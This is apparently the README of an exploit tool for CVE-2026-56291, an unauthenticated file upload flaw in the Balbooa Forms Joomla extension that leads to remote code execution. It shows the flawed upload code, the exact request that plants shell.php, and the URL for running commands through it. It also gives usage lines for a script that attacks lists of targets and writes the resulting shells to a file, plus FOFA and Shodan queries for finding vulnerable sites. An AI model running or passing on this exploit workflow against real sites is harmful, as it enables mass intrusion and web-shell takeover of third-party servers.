
Balbooa Forms (com_baforms) < 2.4.1 — form.uploadAttachmentFile के माध्यम से अनधिकृत फ़ाइल अपलोड से RCE | CVSS 9.8 | CISA KEV
CVE-2026-56291 एक गंभीर (CVSS 9.8) बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड भेद्यता है Balbooa Forms (com_baforms) Joomla एक्सटेंशन (< 2.4.1) में।
form.uploadAttachmentFile फ्रंटएंड कार्य Session::checkToken() को कॉल नहीं करता है या कोई अनुमति जाँच नहीं करता है। अपलोड की गई फ़ाइलें सीधे हमलावर के एक्सटेंशन का उपयोग करती हैं: $fileName = $name . '.' . $ext। फ़ाइलें images/baforms/uploads/form-{id}/ में संग्रहीत होती हैं — सीधे PHP के रूप में निष्पादित की जा सकती हैं।
| संस्करण | स्थिति |
|---|---|
| 1.0 – 2.4.0 | असुरक्षित |
| 2.4.1+ | पैच किया गया |
CISA KEV: 10 जुलाई 2026 को जोड़ा गया — सक्रिय शोषण की पुष्टि हुई।
// FormModel::uploadAttachmentFile (frontend/models/forms/FormModel.php ~L122)
// No Session::checkToken(), no permission check, no extension whitelist
$fileName = $name . '.' . $ext; // attacker's extension used directly
$filePath = JPATH_ROOT . '/images/baforms/uploads/form-' . $formId . '/' . $fileName;
move_uploaded_file($tmpFile, $filePath);
POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1&format=json
file = shell.php (multipart)
→ Saved to images/baforms/uploads/form-1/shell.php
→ https://target.com/images/baforms/uploads/form-1/shell.php?c=id
→ RCE
git clone https://github.com/shinthink/CVE-2026-56291.git
cd CVE-2026-56291
pip install -r requirements.txt
python cve_2026_56291.py -t target.com
python cve_2026_56291.py -f targets.txt -o shells.txt
python cve_2026_56291.py -t target.com --debug
python cve_2026_56291.py -t target.com --no-cleanup
FOFA: body="com_baforms"
Shodan: http.html:"baforms"
| संसाधन | लिंक |
|---|---|
| CISA KEV | cisa.gov/known-exploited-vulnerabilities |
| फिक्स विवरण | mysites.guru |
| शोधकर्ता | Phil Taylor |
बाल्बूआ से संबद्ध नहीं।